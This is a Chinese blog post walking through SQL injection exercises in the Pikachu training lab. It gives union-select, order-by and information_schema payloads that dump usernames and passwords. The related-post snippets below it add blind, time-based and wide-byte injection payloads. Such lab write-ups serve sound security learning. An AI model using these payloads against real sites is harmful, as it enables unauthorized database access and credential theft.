pikachu-sql注入

原创 已于 2023-04-05 16:46:27 修改
· 683 阅读 · 3 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #mysql

于 2023-04-01 18:41:29 首次发布

pikachu-sql注入(1)

数字型注入(post)

本题看似查询选项只有6个,用burp抓取后修改id为7,得到lili的email:

image-20220920191004905

如果在源码中增加echo $query,则可以在网页中直接查看搜索的sql语句;

image-20230401152726315.png

image-20230401152825323.png

用burp 抓包将id改为1 union select 1,2 from users得到下图:

再把1,2分别变成username和password得到users的信息

就显示了管理员的账户和密码了。

字符型注入(get)

(1)注入点的确定

输入asd通过url确定注入点为name:

(2)确定字段数

使用order by确定网页查询字段的数量:

学习order by:https://blog.csdn.net/wangyuxiang946/article/details/121058067

因为查询的是和上题一样的表:通过输入kobe’ order by 1 #来进行确认,不断改变后面数字,确定字段数

学习注释符:SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com)

确定只有两个字段数:

通过查看源码发现确实查询的是两个字段:

(3)确定数据库名和表名

使用联合查询:kobe’ union select database(),version() #

得到数据库名:pikachu
sql版本号5.7.26

5.0以上的版本,才存在information_schema表,这张表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息

输入kobe’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

GROUP_CONCAT()函数将组中的字符串连接成为具有各种选项的单个字符串

得到pikachu的表的名称:

(4)获得表中字段名

用户信息藏在users表中,查字段1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#

得到:

(5)获取账号密码

输入:1’ union select username,password from users#

即可得到账户密码

学习来自大佬:

(38条消息) pikachu字符型注入_祚1的博客-CSDN博客

(38条消息) pikachu之字符型sql注入详细过程_捭阖~的博客-CSDN博客
符型sql注入详细过程_捭阖~的博客-CSDN博客](https://blog.csdn.net/m0_54024658/article/details/116993237)

Resets_
关注
pikachu靶场之SQL注入
2201_75766364的博客
03-28 1339
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 439
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当前数据库表名 根据表名
pikachuSQL注入
qq_58091216的博客
11-04 2442
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
Pikachu靶场-SQL注入
最新发布
sucker的博客
04-21 1330
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
关于PikachuSQL注入
qq_65915499的博客
02-25 1985
name=1’+order+by+3–+ 报错。因为是搜索型注入根据语法‘%like%’输入1’后查看报错发现闭合应该是’通过admin和123456登录。尝试在user-agent注入。BP抓包尝试输入1’尝试注册利用报错注入。BP抓包尝试报错注入。使用sqlmap注入
pikachusql注入
m0_74394274的博客
09-19 1566
大家好
网络安全 - 综合靶场 - PIKACHU 源码包 - pikachu-master.zip
09-22
- **多漏洞场景**:包括但不限于 XSS(跨站脚本攻击)、SQL 注入、CSRF(跨站请求伪造)、文件上传漏洞、文件包含漏洞、命令执行漏洞等。 - **实战操作**:提供了一个真实的操作环境,让用户可以通过实际操作来理解...
pikachu-master.zip
06-25
Pikachu靶场中,你可以学习如何识别SQL注入漏洞,以及使用各种技巧防止此类攻击。 2. XSS(跨站脚本):这种漏洞允许攻击者在用户浏览器上执行恶意脚本,可能导致个人信息被窃取或网站被劫持。靶场会教你如何防御...
PIKACHU-SQL注入(1-5)
koala_king的博客
03-03 219
sql
pikachu靶场-SQL-Inject
braty_的博客
02-23 1578
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 4366
Pikachu-----Sql Inject(SQL注入
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 3645
pikachu靶场通关之sql注入
Pikachu---SQL注入
从不专注的人的博客
07-05 2537
概述 什么是SQL注入漏洞 注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
一文了解pikachuSQL注入
allintao的博客
03-01 3284
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
pikachu-SQL注入
qq_43660551的博客
05-11 2126
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
pikachu平台之sql注入
qq_42728977的博客
12-24 782
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 5910
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu靶场-SQL注入寻找注入类型
01-01
### Pikachu靶场中的SQL注入类型教程 #### 数字型SQL注入 当应用程序未正确过滤用户输入且该输入被用于构建SQL查询的一部分时,可能会发生数字型SQL注入。如果参数是整数形式,则攻击者可以尝试通过改变这个数值来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值